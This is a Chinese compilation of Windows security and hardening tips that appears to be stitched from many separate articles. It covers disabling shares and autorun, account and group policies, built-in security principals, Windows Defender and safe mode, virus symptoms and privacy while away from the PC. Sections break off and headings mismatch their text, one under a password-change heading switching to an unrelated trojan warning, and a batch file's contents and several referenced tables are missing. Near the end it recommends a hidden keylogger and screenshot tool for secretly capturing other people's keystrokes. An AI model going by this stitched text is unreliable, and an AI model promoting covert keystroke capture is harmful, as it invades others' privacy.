加强Windows安全性(精选15篇)
1.用户口令设置
设置一个键的密码,在很大程度上可以避免口令攻击。密码设置的字符长度应当在8个以上,最好是字母、数字、特殊字符的组合,如“psp53,@pq”、“skdfksadf10@”等,可以有效地防止暴力破解。最好不要用自己的生日、手机号码、电话号码等做口令。
2.删除默认共享
单击“开始→运行”,输入“gpedit.msc”后回车,打开组策略编辑器。依次展开“用户配置→Windows 设置→脚本(登录/注销)”,双击登录项,然后添加“delshare.bat”(参数不需要添加),从而删除Windows 2003默认的共享。
接下来再禁用IPC连接:打开注册表编辑器,依次展开
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa ]
分支,在右侧窗口中找到“restrictanonymous”子键,将其值改为“1”即可。
3.关闭自动播放功能
自动播放功能不仅对光驱起作用,而且对其它驱动器也起作用,这样很容易被黑客利用来执行黑客程序。
打开组策略编辑器,依次展开“计算机配置→管理模板→系统”,在右侧窗口中找到“关闭自动播放”选项并双击,在打开的对话框中选择“已启用”,然后在“关闭自动播放”后面的下拉菜单中选择“所有驱动器”,按“确定”即可生效。
4.清空远程可访问的注册表路径
将远程可访问的注册表路径设置为空,这样可以有效防止黑客利用扫描器通过远程注册表读取计算机的系统信息及其它信息。
1. 帐户密码设置
1.1 关闭来宾帐户
来宾帐户即Guest帐户, 它可以访问计算机, 但受到限制。不幸的是, Guest帐户也为黑客入侵打开了方便之门。对于服务器来说, 不需要使用Guest帐户, 为了安全, 应该将Guest帐户关闭、停用、改名。在安全策略中, 将Guest帐户列入拒绝从“网络访问”名单中, 防止黑客利用Guest帐户从网络访问计算机。同时在计算机管理中把Guest帐户停用, 任何时候都不允许Guest帐户登录系统, 为了安全起见, 给Guest帐户设置一个复杂的密码。
1.2 限制用户数量
删除所有的测试帐户、共享帐户和普通部门帐户等。帐户是黑客入侵的突破口, 系统的帐户越多, 黑客得到合法权限的可能性就越大。对于Windows 2003系统来说, 要经常检查系统的帐户, 删除已经不使用的帐户, 如果系统帐户超过10个, 很容易找到弱口令帐户。
1.3 把管理员帐号改名
Windows 2003中的Administrator帐户是系统默认的安装账户, 是不能被停用的, 所以黑客可以不停地尝试去登录这个帐户。很多管理员安装系统后都没有把这个帐号改名, 这样非常容易成为受攻击的目标。因此, 安装系统应该重命名此帐号, 并设置高强度的口令。
1.4 设置陷进帐户
创建一个Administrator帐户, 将该用户隶属的组设为Guests组, 赋予最低权限, 并且设置一个包含字母、数字和特殊符号的超过10位的复杂密码, 这样黑客即使攻击该帐户, 也要费大量的时间。
1.5 设置安全密码
服务器帐户密码最好包括大小写字母、数字和特殊符号, 密码最好大于10位。用户名尽量不要用计算机名、单位名等比较容易猜到的字符。在控制面板中, 用户帐户里设置。
1.6 启用屏幕保护密码
设置屏幕保护密码可以有效防止内部人员破坏服务器。在桌面上单击鼠标右键, 选择属性, 在屏幕保护选项卡中设置。
2. 系统安全策略配置
2.1 关闭不必要的服务
2.1.1 Messenger:
这是发送和接收系统管理员或“警报器”服务消息的服务。自微软公司于90年代中期推出32位操作系统以来, 该服务就一直是windows操作系统中不可缺少的一部分。现在, 很多垃圾邮件发送者都利用这一功能向计算机用户发送垃圾信息, 建议大家禁用该服务。
2.1.2 Remote Registry Service:
该服务允许远程用户通过简单的连接就能修改本地计算机上的注册表设置。知道管理员帐号和密码的人远程访问注册表是很容易的。现在, 不少木马后门程序可以通过此服务来修改目标机器的注册表, 强烈建议大家禁用该项服务。
2.1.3 Clipbook:
这个服务允许任何已连接的网络中的其他用户查看本机的剪贴板。为了安全, 将该服务设置为手动。Clipbook所支持的Clipbook Viewer程序可以允许剪贴页被远程计算机上的Clipbook浏览, 可以使用户能够通过网络连接来剪切和粘贴文本和图形。
2.1.4 Computer Browser:
这个服务可以将当前机器所使用网络上的计算机列表提供给那些请求得到该列表的程序 (很有可能是恶意程序) , 很多黑客可以通过这个列表得知当前网络中所有在线计算机的标志并展开进一步的攻击。
2.1.5 Terminal Services:
该服务提供多会话环境, 允许客户端设备访问虚拟的系统桌面会话以及运行在服务器上的基于Windows的程序并打开默认为3389的对外端口, 允许外来IP的连接 (著名的3389攻击所依靠的服务就是它) 。
2.1.6 Indexing Service:
Indexing Service是一个搜索引擎。同时, 它也是很多蠕虫病毒爆发的罪魁祸首, 例如曾流行一时的红色代码就是利用IIS的缓冲区溢出漏洞和索引服务来进行传播的。
2.1.7 Error Reporting Service服务:
Error Reporting Service (错误报告服务) 的进程名是Svchost.exe。这个服务我们经常碰到, 当使用程序出错时会跳出对话框, 问你是否需要向微软发送报告, 就是这个服务的功能, 此服务也是攻击者的一个后门。
2.2 开启审核策略
开启安全审计策略是Windows的基本安全保障措施, 当有人尝试对系统进行某些方式入侵的时候, 都会被安全审计记录下来, 如果对系统的安全审计策略进行合理设置, 当有人尝试入侵时, 就可以从日志里看到。审核策略太多, 容易占用系统资源, 开启必要的策略即可。开启策略如表1所示。
2.3 开启帐户策略
开启帐户策略可以有效地防范字典式攻击。设置如表2所示。
2.4 关闭文件共享
对于服务器来说, 不需要共享文件, 可以直接把共享文件关。Windows 2003提供了默认的共享功能, 包括所有的逻辑盘和系统盘, 这些共享功能为黑客入侵带来了很大的方便。通过以下几种方式可以来关闭默认共享。
2.4.1 打开网络连接, 在网络连接属性中把“Mi-crosoft网络文件和打印机共享卸载”。
2.4.2 打开控制面板, 找到管理工具, 通过其中的计算机管理, 关闭默认共享。这种方法有个缺点, 当系统重新启动后, 这些默认共享又会重新启动。
2.4.3 通过批处理关闭。新建一个Shutdown Share.bat文件, 文件内容为:
…… (有几个硬盘分区就写几行命令)
2.5 关闭不必要的端口
关闭端口, 系统提供的服务会减少, 意味着被入侵的概率在降低。对于一台Web服务器来说, 只运行TCP的80端口通过就可以了。设置端口开放的方法如下:在IP地址设置窗口中单击“高级”按钮, 在出现的对话框中选择“选项”选项卡, 选中“TCP/IP筛选”, 单击“属性”按钮, 在弹出的对话框中设置允许通过的端口。
2.6 禁止建立空连接
默认情况下, 任何用户可通过空连接连上服务器, 进而枚举出帐号, 猜测密码。修改注册表来禁止建立空连接:将HKEY_LOCAL_MACHINESYS-TEMCurrent Control SetControlLSA中, Restrict Anonymous的值改成1即可。
2.7 不显示上次登录的用户名
默认情况下, 终端服务接入服务器时, 登录对话框中会显示上次登录的用户名, 本地的登录对话框也一样。修改注册表禁止显示上次登录名:将HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrent VersionWinlogon中, Dont Display Last User Name的值改为1即可。
摘要:随着网络技术的发展, 网络攻击越来越多, 网络安全问题越来越严重。本文对学校Web服务器上使用的Windows 2003操作系统安全加固进行了详细研究, 给出了Windows 2003操作系统的安全加固方法, 成功提高了学校Web服务器的安全性。
关键词:服务器,Windows 2003,安全
参考文献
[1]陈学平.计算机网络安全与应用[M].北京:化学工业出版社, 2012.
微软新近推出的Windows 8测试版不同于以往的开发者预览版,此次推出的是面向所有用户的消费者预览版,所有人都可以下载新的Windows 8预览版进行测试。但是作为测试版本,该版本仍难免存在各种缺陷,甚至存在严重的系统错误。为此,我们特意为大家介绍一种与众不同的测试方式,让大家都可以安全地测试新的操作系统。
我们可以选择在虚拟机上测试Windows 8,这将是最方便和最安全的方法,无论测试过程中Windows 8系统出现什么样的问题,物理硬盘上原有的数据仍旧可以确保安然无恙。但是虚拟机中操作系统与应用软件的运行速度较慢,我们肯定无法充分体验Windows 8的性能,因此,我们推荐大家在独立的硬盘分区上安装测试版Windows 8,这种方法可以尽可能地提高系统速度,唯一的问题是实现的步骤相对比较复杂。下面我们就分步骤为大家进行详细的介绍。
新的Windows 8测试版中各项功能已比较完善,基本上能够满足一般用户日常工作、学习的需要。但是由于Windows 8相对于以往的Windows操作系统有较大的改变,因而,在使用过程中我们将会不可避免地遇到各种各样的问题。要真正用好Windows 8,充分发挥其性能,我们需要掌握一定的操作技巧,为此,我们还特意为大家准备了一些Windows 8预览版的使用技巧,感兴趣的用户可以参考本期经验技巧栏目中所介绍的相关内容。
1.限制密码最小长度
打开注册表编辑器,依次展开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
policiesNetwork分支,在右侧窗口新建字符串值MinPwdLen,并设置其值为适当大小如6(必须大于等于0小于等于8),
以后设置密码时,如输入密码的位数小于6,系统就会提示我们增加密码的位数,保护系统安全。
2.禁止别人更改密码
目前已经发现了若干国内网站利用该漏洞进行木马传播的例子,此漏洞有可能成为网页种植木马的又一“利器”,
请广大网民在上网时不要浏览来源不明的网站和电子邮件,一定要开启杀毒软件的系统监测实时监控功能,进行网页“滤毒”处理,并及时升级病毒库。
Windows 2000 安全策略
本部分介绍各种安全策略工具及其有关安全策略应用的优先级顺序,默认情况下,组策略具有继承性和累积性,并且影响 Microsoft Active Directory® 容器中的所有计算机。通过使用组策略对象 (GPO) 可以管理组策略,这些组策略对象是在选定 Active Directory 对象(如站点、域或组织单位 (OU))的特定层次结构中附加的数据结构。
创建了这些 GPO 后,可以按照如下标准顺序应用:LSDOU,其表示 (1) 本地、(2) 站点、(3) 域、(4) OU。后应用的策略优先级高于先应用的策略优先级。如果某台计算机属于某一域,并且在域和本地计算机策略之间存在冲突时,则域策略有效。然而,如果某台计算机不再属于某一域,则应用本地组策略。
计算机加入实施 Active Directory 和组策略的域时,会处理本地 GPO。请注意,甚至在指定了“阻止策略继承”选项时,也会处理本地 GPO 策略。
可以在默认域 GPO 本地策略(审核策略、用户权限分配和安全选项)中定义整个域的帐户策略(密码、帐户锁定和 Kerberos 策略),因为在默认域控制器 GPO 中定义了域控制控制器 (DC) 。对于 DC,在默认 DC GPO 中定义的设置优先级高于在默认域 GPO 中定义的设置。这样,如果在默认域 GPO 中配置用户特权(例如,“域中添加工作站”),则对此域中的 DC 没有影响。
存在有在特定 GPO 中允许强制实施组策略的选项,这样可以防止较低级别的 Active Directory 容器中的 GPO 替代此策略。例如,如果在域级别定义了特定 GPO,并指定强制实施 GPO,则 GPO 包含的策略将会应用于此域中的所有 OU;也就是说,较低级别的容器 (OU) 无法替代此域组策略。
注意:帐户策略安全区域接收它在此域计算机中生效的专门处理方式。此域中的所有 DC 接收来自在域节点配置的 GPO 的帐户策略,而不考虑 DC 的计算机对象的位置。这样可确保对于所有域帐户强制实施一致的帐户策略。域中的所有非 DC 的计算机可按照正常的 GPO 层次结构来获得这些计算机上本地帐户的策略。默认情况下,成员工作站和服务器强制实施其本地帐户域 GPO 中配置的策略设置,但如果存在有替代默认设置的更低范围的其他 GPO,则这些设置将会生效。
本地安全策略
使用本地安全策略可以在本地计算机中设置安全要求,
其主要用于单独计算机或用于将特定安全设置应用于域成员。在 Active Directory 托管网络中,本地安全策略设置具有最低优先级。
• 打开本地安全策略
1.以管理员权限登录到计算机。
2.在 Windows 2000 Professional 计算机中,默认情况下“管理工具”不会作为“开始”菜单中的选项进行显示。要在 Windows 2000 Professional 中查看“管理工具”菜单选项,请单击“开始”,指向“设置”,然后单击“任务栏和开始菜单”。在“任务栏和开始菜单属性”窗口中,单击“高级”选项卡。在“开始菜单设置”对话框中选择“显示管理工具”。单击“确定”按钮完成设置。
3.单击“开始”,指向“程序”,再指向“管理工具”,然后单击“本地安全策略”。这样就可以“本地安全设置”控制台。
图 1:本地安全设置 域安全策略
使用域安全策略可以设置和传播域中所有计算机的安全要求。域安全策略替代域中所有计算机的本地安全策略设置。
• 打开域安全策略
1.打开“Active Directory 用户和计算机”管理单元。
2.右键单击要查看的适当的组织单位或域,然后单击“属性”。例如,要查看域安全策略,右键单击域。要查看域控制器策略,右键单击“域控制器”OU。
3.单击“组策略”选项卡。
4.单击“编辑”按钮。
5.展开“Windows 设置”。
6.在“安全设置”树中执行安全配置。
组织单位组策略对象
应该使用 OU 管理域中的安全策略。此域已经与域控制器 OU 一起提供。但是,可以根据需要定义其他 OU。例如,在域级别应该应用基准设置,然后在 OU 级别应用特定设置。这样,可以创建工作站 OU 并将所有工作站置于其中,创建域服务器 OU 并将所有域成员服务器置于其中,等等。
OU GPO 可以替代由前面讨论的策略界面实施的安全策略设置。例如,如果为域设置的策略与为域控制器 OU 配置的相同策略不兼容,则域控制器不会继承域策略设置。通过在创建 OU GPO 时选择“禁止替代”选项,可以避免发生此情况。“禁止替代”选项会强制所有子容器继承来自父容器的策略,即使在这些策略与子容器的策略有冲突以及为子容器设置了“阻止继承”的情况下也是如此。通过单击 GPO 的“属性”对话框上的“选项”按钮,定位“禁止替代”复选框。
其他安全配置界面
在Windows操作系统中, 安全主体除了大家所熟知的用户, 还有用户组、内置安全主体。接下来, 我们就详细介绍几个与访问控制较为紧密的内置安全主体。
1 Windows操作系统的几个内置安全主体
System/Local System (S-1-5-18) :系统/本地系统, 操作系统使用的服务帐户。打开任务管理器会发现一些进程就是以System/Local System身份运行的。System/Local System是Administrators组的隐藏成员, 所以, 任何以System/Local System身份运行的进程其访问令牌具有内置的Administrators组的SID。以System/Local System身份运行的进程除了具有管理员权限, 其启动时机也较早, 在操作系统加载阶段即已运行, 这也是很多病毒想方设法注册成为系统服务的原因。
Everyone (S-1-1-0) :所有人, 在运行Windows Server 2003及以后版本操作系统的计算机上, Everyone包括Authenticated Users和Guest。
Authenticated Users (S-1-5-11) :已验证身份的, 包括其身份已经得到验证的所有用户和计算机。Authenticated Users不包括Guest, 即使Guest帐户有密码。
Creator Owner (S-1-3-0) :创建者, 创建对象时操作系统会为对象分配所有者, 而默认情况下创建者就是该对象的所有者。
Windows操作系统里的内置安全主体很多, 想要了解更多请访问微软Tech Net。
2 与内置安全主体有关的一些事实
2.1 登录后Administrator帐户隶属于Users组
由上面的介绍可知, 任何已得到身份验证的用户和计算机都隶属于Authenticated Users;这样, 当内置帐户Administrator登录后也将隶属于它。如果我们查看Users组的成员, 会发现Authenticated Users就在其中。所以, Administrator登录后将是Users组成员。事实上, 在Windows操作系统中, 任何已登录帐户都属于Users组;所以, 在设置文件/文件夹的ACL时, 尽量避免拒绝Users组的权限, 不授予即可, 不然可能会导致不必要的麻烦。
2.2 文件/文件夹创建者默认具有完全控制权限
Windows NT内核的操作系统作为《可信计算机系统评价标准》 (TCSEC) C2安全级别的操作系统, 采用了自主的访问控制 (DAC) , DAC最显著的特点便是资源的所有者能完全控制资源。由上面的介绍可知, 默认Creator Owner是对象的所有者, 那么它也就对所创建对象具有完全控制权限。
2.3 对系统安装目录访问权限的变迁
由上面的介绍可知, 在运行Windows Server 2003及以后版本操作系统的计算机上, Everyone包括Authenticated Users和Guest。为了更好的保证系统安装目录的安全, 这些年微软在对系统安装目录的默认权限上也做了一些变化。
在Windows Server 2003操作系统上默认Everyone对系统安装目录具有读取和运行权限, 而在Windows Server 2008操作系统上Everyone已经没有了权限。当然, 变化并不只体现在服务器操作系统上, 在工作台操作系统上亦有所变化, 请读者自查。
3 结语
Windows操作系统在实际的生活、工作中仍被大量的使用, 当我们使用Windows操作系统来共享资源 (通常是文件或文件夹) 时, 会发现对共享资源进行访问控制是多么重要, 那么了解Windows操作系统的内置安全主体就是一件绕不开的事情, 希望这篇文章能对有这些需要的读者有所裨益。
摘要:为了确保共享资源的安全, 我们常常要进行访问控制。如果要在Windows操作系统上进行访问控制, 就势必要了解Windows操作系统的内置安全主体及其权限, 以及与这些内置安全主体相关的一些事实。本文就是来探讨这些的。
关键词:访问控制,内置安全主体,权限
参考文献
[1]安全标识符技术概述[EB/OL].https://technet.microsoft.com/zh-cn/library/dn743661 (v=ws.11) .aspx.
[2]赵瑞华.Windows 7系统上病毒的一些启动时机[J].电脑与信息技术, 2015 (23) :43-45.
[3]访问控制概述[EB/OL].https://technet.microsoft.com/zh-cn/library/dn408189 (v=ws.11) .aspx.
1. 手动调用Defender的方法
Windows Defender藏在Windows 10的后台,安全的时候它一般不会出来,只有当发现问题,它才会自动跳出来提醒处理。但若要手动全盘扫描,需要临时调出这个软件,还要到系统“纵深”方向去摸索寻找。
Windows Defender藏得比较深,按照常规办法,点击“开始”菜单的“所有程序”,然后再定位到“Windows系统”分支,在下面才能找到它的影子。此外,在系统设置的“更新和安全”分组窗口中,选择Windows Defender项并将右侧列表移动到最底部,也才能看到打开Windows Defender的文字链接(图1)。
2. 建立快捷查杀的启动方式
Windows Defender藏得较深,调用不方便,我们可以为其建立快捷方式,以方便调用。将Windows Defender快捷方式添加到桌面或任务栏,调用起来就方便多了。
搜索系统分区“C:\Program Files\Windows Defender”文件夹,找到MSASCui.exe文件并右击,选择“发送到→桌面快捷方式”,可在桌面上建立启动Windows Defender的快捷方式(图3)。为便于识别,可将快捷方式更名为Windows Defender。
Windows Defender启动后其图标会显示在任务栏托盘,但关闭之后该图标随即会消失。为此,可通过修改注册表让其常驻任务栏。启动注册表编辑器并定位到“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”,在右侧窗格右击新建“字符串值”并重命名为“Windows Defender”,双击设置其数值数据为“"%ProgramFiles%\Windows Defender\MSASCui.exe"-runkey”(注意是半角引号)(图4)。重启资源管理器之后,安全软件图标就会出现在任务栏上了。
3. 离线应急启动Defender
如果Windows系统因病毒造成无法启动,也就失去了靠其自身的功能查杀的能力。此时,可用提前制作好的离线版Defender进行查杀。离线版的制作需要先通过微软网站下载Windows Defender离线版工具,运行并创建启动闪存盘或光盘。用此移动介质启动电脑后,查杀电脑中存在的恶意软件,抢救出有用的数据。
4. Defender服务无法启动
第三方的杀毒软件接管了系统安全之后,Windows自带的Windows Defender软件服务会随之关闭。之后,如果想要开启Windows Defender服务,可能会遇到服务无法启动的问题(图6)。
1.修复系统故障
如果Windows运行起来不太稳定或者无法正常启动,这时候先不要忙着重装系统,试着重新启动计算机并切换到安全模式启动,之后再重新启动计算机,系统是不是已经恢复正常了?如果是由于注册表有问题而引起的系统故障,此方法非常有效,因为Windows在安全模式下启动时可以自动修复注册表问题,在安全模式下启动Windows成功后,一般就可以在正常模式(Normal)下启动了
2.恢复系统设置
如果用户是在安装了新的软件或者更改了某些设置后,导致系统无法正常启动,也需要进入安全模式下解决,如果是安装了新软件引起的,请在安全模式中卸载该软件,如果是更改了某些设置,比如显示分辨率设置超出显示器显示范围,导致了黑屏,那么进入安全模式后就可以改变回来,还有把带有密码的屏幕保护程序放在“启动”菜单中,忘记密码后,导致无法正常操作该计算机,也可以进入安全模式更改
3.删除顽固文件
我们在Windows下删除一些文件或者清除回收站内容时,系统有时候会提示“某某某文件正在被使用,无法删除”的字样,有意思的是,通常这些文件并没有正在被使用,那么是不是让这些文件永远霸占我们的硬盘呢?请不要着急,重新启动计算机,并在启动时按下F8键进入安全模式,试着删除那些顽固文件并清空回收站看一看,没了!原来Windows已经放弃了对这些文件的保护,可以把它们删除了
4.彻底清除病毒
现在病毒一天比一天多,杀毒软件也跟着天天更新,
但是,在Windows正常模式下有时候并不能干净彻底地清除病毒,因为它们极有可能会交叉感染,而一些杀毒程序又无法在DOS下运行,这时候我们当然也可以把系统启动至安全模式,使Windows只加载最基本的驱动程序,这样杀起病毒来就更彻底、更干净了
5.磁盘碎片整理
有一点可以肯定计算机病毒不会在自己的硬盘里“生”出来。它一定是从其它储存介质复制到我们的硬盘,通常有许多途径都可以让病毒有被复制在我们硬盘的可能性。下载就是其中被病毒传播者用得比较多的一种途径。我们在下载时,不管是电影、压缩包、游戏、文档、或是邮件都有可能被置放病毒。因而下载回来一定要记住:先扫描后使用。
由于闪盘价格的大幅度下降,拥有U盘等闪盘的用户越来越多。闪盘被病毒盯上,这种传播方式需要在U盘根目录下新建一个名为autorun.inf的文件和复制病毒本身。事前在根目录下新建名为autorun.inf的文件夹能防止这种方式的传播此外
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExploer]主键下,在右窗格中找到“NoDriveTypeAutoRun”,就是这个键决定了是否执行各类盘的AutoRun功能。其中DRIVE_REMOVABLE 2 1 04H 表示可移动驱动器。也就是说可以利用这个键来防止各类盘的自动播放,预防中毒。[1]
光盘有时也有可能会被病毒感染,成为病毒传播的途径之一。另外系统本身存在的漏洞也是病毒利用的途径之一。
因而预防病毒要做到,外来的文件要先经过扫描后才使用,系统的漏洞要及时补上。
病毒是如何激活运行的?
计算机病毒是一个程序,一段可执行码,一个可执行文件。如何它不运行它就不会对系统造成威胁。最多只是占着硬盘空间。但是一旦激运行了病毒程序,它会对系统造成怎么样的损害依病毒的破坏性强弱和计算机系统本身的自我保护能力而定。因而不给病毒运行的机会,就是病毒存在于硬盘中也不会对系统造成严重破坏。那如何防止病毒的激活呢?一般情况下,病毒会有好几种启动方式。病毒用的比较多的是注册表和系统服务。注册表环境复杂,大多数计算机用户对其望而生畏。病毒很喜欢将其启动的资料放在这里面。而系统服务会在系统启动的过程中被自动启动,因而病毒也很喜欢躲在这里面混水摸鱼。[2]
除了这两种启动方式外,还有捆绑文件,各类盘的自动播放,文件关联,程序映射等方法也能让病毒有被激活运行的可能性。
保证计算机病毒不被激活是计算机病毒预防工作的重点之一。所以对注册表用启动程序的关键键值要加以注意。定时查看系统服务是不是正常。利用一些小工具查看文件关联是否正常,有没有程序已经被映射了。对外来文件要先经过扫描后先可以使用。
除了以上方法外,给系统装上一个合适的杀病软件和防火墙也是非常必要的。它们对已经出名的病毒的查杀能力是很强的。这样可以帮计算机管理员省去不少工作。
如果病毒已经激活了。及时发现病毒的存在能保证系统受到的破坏最小。那病毒有哪些症状呢?
从目前发现的病毒来看,主要症状有:
(1)由于病毒程序把自己或操作系统的一部分用坏簇隐起来,磁盘坏簇莫名其妙地增多。
(2)由于病毒程序附加在可执行程序头尾或插在中间,使可执行程序容量增。
(3)由于病毒程序把自己的某个特殊标志作为标签,使接触到的磁盘出现特别标签。
(4)由于病毒本身或其复制品不断侵占系统空间,使可用系统空间变小。
(5)由于病毒程序的异常活动,造成异常的磁盘访问。
(6)由于病毒程序附加或占用引导部分,使系统导引变慢。
(7)丢失数据和程序。
(8)中断向量发生变化。
(9)打印出现问题。
(10)死机现象增多。
(11)生成不可见的表格文件或特定文件。
(12)系统出现异常动作,例如:突然死机,又在无任何外界介入下,自行起动。
(13)出现一些无意义的画面问候语等显示。
(14)程序运行出现异常现象或不合理的结果。
(15)磁盘的卷标名发生变化。
(16)系统不认识磁盘或硬盘不能引导系统等。
(17)在系统内装有汉字库且汉字库正常的情况下不能调用汉字库或不能打印汉字。
(18)在使用写保护的软盘时屏幕上出现软盘写保护的提示。
(19)异常要求用户输入口令
当出现这些情况时请及时检查系统。或许病毒正运行在系统上,破坏着系统!
自动启用加密屏保
如果Windows系统正在启动过程中,用户这时由于有事情突然离开计算机,而系统恰好又启用了自动登录功能时,那么别人就有可能趁主人不在时,偷偷访问到用户的隐私信息。为了保护这段时间的系统安全,我们必须想办法让Windows系统在成功完成登录操作后,尽快启动屏幕密码保护功能,避免恶意用户无机可趁。
首先依次单击“开始”|“运行”命令,弹出系统运行文本框,输入“regedit”命令单击回车键后,进入系统注册表编辑界面,从该界面左侧列表区域,找到注册表分支HKEY_CURRENT_USER\Control Panel\desktop。
其次检查该分支下是否存在“ScreenSaveActive”字符串键值,如果找不到该键值时,可以用鼠标右键单击目标分支,从弹出的右键菜单中依次点选“新建”|“字符串值”命令,将新创建的键值取名为“ScreenSaveActive”,再双击该键值,打开如图1所示的编辑数值对话框,输入数值“1”,按“确定”按钮,这样系统屏幕保护功能就会被成功启用了。
接着用鼠标右键单击同样的注册表分支,依次执行右键菜单中的“新建”|“字符串值”命令,将新建键值取名为“ScreenSaverlsSecure”,之后打开该键值的编辑数值对话框,输入数值“1”,这样会强制Windows系统启用密码保护功能了。
完成上述设置后,重新启动计算机系统,这样本地系统日后登录成功后,在一分钟内如果没有进行任何操作时,密码保护的屏幕保护程序将会自动启动,只有知道系统登录密码的用户,才能打开系统桌面并进行操作。
隐藏重要工作窗口
一些应用程序启动运行相当费时,好不容易将其程序窗口打开,并在其中进行重要工作时,一个电话突然打来,自己要立即离开计算机一段时间。这时,是否只有关闭程序窗口或锁定系统,才能保证重要工作不会被偷窥呢?不见得!我们可以利用专业工具WindowManager来临时将重要的程序窗口隐藏加密起来,等到自己回来后再执行快速恢复,这样就能既保证工作效率,又不影响安全了。
从网上下载获得WindowManager的安装程序包,按照默认设置将其正确安装到本地计算机系统,从系统“开始”菜单中启动运行该程序,对应程序快捷图标会出现在系统托盘区域处。用鼠标右键单击该快捷图标,执行右键菜单中的“Open WindowManager dialog”命令,切换到如图2所示的设置对话框,在这里我们能看到当前系统中所有处于启动运行状态的应用程序名称,将处理重要工作的程序窗口选中,并按下“Hide”按钮,我们在系统桌面上就看不到目标程序窗口了,而且位于系统托盘区域处的快捷程序控制图标也会随之消失,此时按下“Close”按钮退出WindowManager程序控制窗口。
当用户回来需要恢复重要工作窗口时,只要按下系统托盘区域处的WindowManager程序快捷图标,从程序恢复列表中选择目标工作窗口名称,就能快速打开重要工作窗口了。利用这种方式,其他用户也能轻松将处于隐藏状态的重要工作窗口恢复起来。为了避免这种现象,我们可以利用加密方式来阻止其他用户随意恢复程序窗口。在进行加密操作时,用鼠标右键单击托盘区域处的WindowManager程序快捷图标,执行右键菜单中的“Settings”命令,切换到对应程序设置对话框,点选“Security”选项卡,将对应选项设置页面中的“restoring hidden windows”选项选中,再按下“set password”按钮,设置控制密码即可。为了避免恶意用户任意关闭WindowManager程序,还可以在对应程序设置对话框中,将“closing the WindowManager”选中,并设置控制密码,这样其他用户必须凭借密码才能关闭或恢复应用程序窗口。
追踪偷偷登录痕迹
有的时候,本地计算机系统可能开启有多个用户账号。当用户由于突然有事需要办理,中途离开计算机一段时间后,很想弄清楚不在计算机现场的时候,究竟有没有其他用户偷偷登录使用过本地系统,这该如何是好呢?其实,对本地系统进行下面的设置操作,可以轻松追踪其他用户的登录痕迹:
首先依次单击系统桌面上的“开始”|“运行”选项,弹出系统运行文本框,执行字符串命令“gpedit.msc”,开启系统组策略编辑器运行状态。将鼠标定位在该编辑界面左侧列表中的“计算机配置”、“管理模板”、“Windows组件”、“Windows登录选项”节点上。
其次找到该节点下的“在用户登录期间显示有关以前登录的信息”选项,并用鼠标双击之,展开如图3所示的选项设置对话框,选中这里的“已启用”选项,确认后保存设置操作。这样,Vista以上版本系统日后就能自动追踪在我们离开期间,任何用户偷偷登录系统的痕迹了。当急事办理结束后,重新回到计算机现场时,登录屏幕上就会将上次登录系统的状态信息自动显示出来,从这些信息中就可以轻易识别出本地计算机是否有人偷偷登录过了。
保护隐私窗口程序
当有急事办理,需要暂时离开本地系统现场时,最方便、最常用的安全保护方法,无疑就是启用加密的屏幕保护程序。然而,如果将本地计算机临时借给别人使用时,屏幕保护程序就无用武之地了。此时,不妨借助外力工具LockThis!来帮忙,对那些需要防止别人看到的隐私窗口或活动程序进行加锁保护,其他人只有知道访问密码才能看到隐私内容,这样就能很好地保护系统安全了。
nlc202309030049
在为隐私窗口或程序提供安全保护时,先开启LockThis!程序的运行状态,这时它的快捷图标会自动显示在系统任务栏右下角区域,用鼠标右键单击该图标,从弹出的快捷菜单中选择“admin panel”命令,在其后界面中输入默认密码内容“LockThis!”(该密码内容没有大小写之分),切换到如图4所示的设置界面,先将“use admin password”、“Single password for protection”等选项全部选中,确保隐私窗口加锁密码与LockThis!程序管理密码相同。接着,按下“Admin Password”设置项下面的“change admin password”按钮,进入密码调整对话框,按提示设置好新的加密内容,建议新的密码内容尽量同时包含特殊字符、数字、字母等,以避免被黑客轻易破解,再单击“OK”按钮保存设置操作。
选中某个需要保护的窗口或程序,按下Ctrl键并点击对应窗口中的最小化按钮,就能轻松完成目标窗口或程序加密任务了!按照同样的操作方法,将其他多个重要窗口或程序依次保护起来,以防止他人轻松偷窥到自己的隐私内容。
当别人将借用的计算机返还给自己时,可以从系统任务栏中选择需要访问的隐私窗口名称,正确输入之前设定的加密内容,就能对指定窗口或程序解锁了,这样又可以在该窗口中继续工作了。要是不清楚加密内容时,我们就无法继续使用该窗口或程序。
追查偷偷输入操作
在有急事离开计算机现场时,如果担心有人偷偷使用过本地系统的话,不妨对本地系统中的键盘鼠标输入内容进行暗中监视,根据监视结果就能随时掌控系统使用状况。要做到这一点,可以请“键盘记录截图”这款小工具来帮忙,只要将其开启,并进行合适设置,就能让其悄悄监控键盘、鼠标活动状态,并能让其按照需要截取屏幕内容,由于该工具启动后,悄悄躲在后台运行,一般不容易被人轻易察觉到。
下载安装好“键盘记录截图”工具,并从系统“开始”菜单中启动运行它,点击提示对话框中的“确定”按钮,让“键盘记录截图”自动工作在隐藏状态,这样别人就不能从系统任务栏中或托盘区域处,发现该程序的“踪迹”了,这能避免别人通过关闭程序方法躲避自动监控。当要使用“键盘记录截图”保护系统安全时,只要按下快捷键“Ctrl+Alt+右光标键”,展开如图5所示的主监控界面,在这里所有键盘鼠标输入内容都能被直观地看到,同时该工具会将监控到的内容自动保存在“C:\Record”文件夹中。
如果安装使用的是注册版“键盘记录截图”工具,还可以开启自动抓图功能,实现对屏幕内容的连续监控,以便保证监控操作的准确性。监控到的屏幕内容,会被自动保存成jpg图像文件,它们也会自动存放在“C:\Record”文件夹中。当然,在进行自动监控时,需要打开程序设置对话框,设置抓图间隔时间,该参数取值范围为1-999分钟。如果本地系统硬盘空间足够大,建议将间隔时间设置得稍微小一些,如果系统分区空间不够使用时,不妨点击“更改目录”按钮,将监控文件保存路径指向其他分区。日后,打开监控文件,就能轻松追查到偷偷输入操作了。
自动进行安全提示
有的时候,碍于情面,很多人不好意思为计算机设置安全访问密码,但如果出了问题,那苦果只能自己一个人咽。其实,在有急事短暂离开计算机的时候,可以开启计算机系统的安全提示功能,提醒他人在本地系统登录时,不能随意改动系统设置,以保证系统安全,而同事或好友见到这样的提示后,一般都会自觉遵守的,下面就是该方法的具体实现步骤:
